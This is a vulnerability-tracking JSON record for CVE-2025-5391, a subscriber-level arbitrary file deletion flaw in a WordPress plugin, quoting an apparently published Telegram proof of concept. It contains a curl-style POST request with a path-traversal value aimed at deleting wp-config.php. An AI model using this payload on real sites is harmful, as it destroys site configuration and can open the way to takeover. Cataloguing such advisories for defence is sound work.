{"uuid": "b5a3056d-84fc-4388-84ae-487c3e25ee6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-5391", "type": "published-proof-of-concept", "source": "https://t.me/liwaamohammad/5085", "content": "CVE-2025-5391:\n\n- Authenticated (Subscriber+) Arbitrary File Deletion\n\npoc: url -v -X POST \"http:///wp-admin/admin-ajax.php\" \\\n  -H \"Cookie: \" \\\n  -d \"action=wcpo_delete_purchase_order_file\" \\\n  -d \"nonce=\" \\                        \n  -d \"file_path=/../../wp-config.php\"\n\n\n#poc #exploit", "creation_timestamp": "2026-03-19T04:02:40.000000Z"}